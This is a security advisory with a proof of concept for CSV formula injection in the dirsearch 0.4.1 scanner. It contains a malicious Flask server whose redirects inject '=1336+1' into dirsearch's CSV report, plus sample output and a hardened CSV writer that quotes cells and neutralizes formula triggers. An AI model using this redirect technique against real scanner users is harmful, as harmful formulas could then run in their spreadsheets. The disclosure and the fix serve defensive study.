
# Exploit Title: dirsearch 0.4.1 - CSV Injection
# Author: Dolev Farhi
# Date: 2021-01-05
# Vendor Homepage: https://github.com/maurosoria/dirsearch
# Version : 0.4.1
# Tested on: Debian 9.13

dirsearch, when used with the --csv-report flag, writes the results of crawled endpoints which redirect to a CSV file without sanitization.

A malicious server can redirect all of its routes/paths to a path that contains a comma and a formula, e.g. /test,=1336+1, and thereby escape the normal dirsearch CSV structure and inject its own formula into the report.

1. Malicious Flask Webserver:

"""
from flask import Flask, redirect

app = Flask(__name__)


# Every crawled route answers with a 302 whose Location contains a comma
# followed by a formula; dirsearch writes that value to the CSV as-is.
@app.route('/')
def index():
    return redirect('/test,=1336+1')


@app.route('/admin')
def admin():
    return redirect('/test,=1336+1')


@app.route('/login')
def login():
    return redirect('/test,=1336+1')


if __name__ == '__main__':
    # Serve on port 80 so the target URL used in step 2 resolves to this app.
    app.run(host='0.0.0.0', port=80)
"""

2. Tester runs dirsearch

root@host:~/# python3 dirsearch.py -u http://10.0.0.1 --csv-report=report.csv

_|. _ _ _ _ _ _|_ v0.4.1
(_||| _) (/_(_|| (_| )

Extensions: php, asp, aspx, jsp, html, htm, js | HTTP method: GET | Threads: 30 | Wordlist size: 2

Error Log: /root/tools/dirsearch/logs/errors-21-01-06_04-29-10.log

Target: http://10.0.0.1

Output File: /root/tools/dirsearch/reports/10.0.0.1/_21-01-06_04-29-10.txt

[04:29:10] Starting:
[04:29:11] 302 - 233B - /admin -> http://10.0.0.1/test,=1336+1
[04:29:11] 302 - 233B - /login -> http://10.0.0.1/test,=1336+1

3. Result CSV

root@host:~/# cat report.csv

Time,URL,Status,Size,Redirection
Wed Jan 6 04:29:11 2021,http://10.0.0.1:80/admin,302,233,http://10.0.0.1/test,=1336+1
Wed Jan 6 04:29:11 2021,http://10.0.0.1:80/login,302,233,http://10.0.0.1/test,=1336+1
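As an added example (not dirsearch's own code), the report row written the unquoted way shown above beside a hardened writer that quotes every field with Python's csv module and prefixes formula triggers, plus a check that parses the line back into cells; the redirect URL is the advisory's value, the function names are assumptions.

```python
# Added example (not dirsearch's own code): the vulnerable unquoted row beside
# a hardened writer that quotes fields and neutralizes spreadsheet formula
# triggers. The redirect URL is the advisory's; function names are hypothetical.
import csv
import io

HEADER = ["Time", "URL", "Status", "Size", "Redirection"]
# Leading characters that spreadsheets treat as the start of a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def naive_row(time, url, status, size, redirect):
    """Unquoted join, as in the vulnerable report: a comma inside `redirect`
    adds a column and the text after it becomes a cell starting with '='."""
    return ",".join([time, url, str(status), str(size), redirect])


def neutralize(value):
    """Prefix a cell a spreadsheet would evaluate with a single quote so it
    is stored as literal text."""
    text = str(value)
    return "'" + text if text.startswith(FORMULA_TRIGGERS) else text


def safe_row(time, url, status, size, redirect):
    """Quote every field with the csv module (commas stay inside the cell)
    and neutralize formula triggers before writing."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="")
    writer.writerow([neutralize(v) for v in (time, url, status, size, redirect)])
    return buf.getvalue()


def parse_row(line):
    """Split one CSV line into cells the way a spreadsheet import would."""
    return next(csv.reader(io.StringIO(line)))


def cells_are_safe(line):
    """True when the line has exactly the expected column count and no cell
    begins with a formula trigger."""
    cells = parse_row(line)
    return len(cells) == len(HEADER) and not any(
        c.startswith(FORMULA_TRIGGERS) for c in cells)


# Constructed sample matching the advisory's report.csv line.
REDIRECT = "http://10.0.0.1/test,=1336+1"
ARGS = ("Wed Jan 6 04:29:11 2021", "http://10.0.0.1:80/admin", 302, 233, REDIRECT)
```

The hardened row keeps the redirect URL in a single quoted cell, so the report parses back to the five header columns and no cell begins with a formula character.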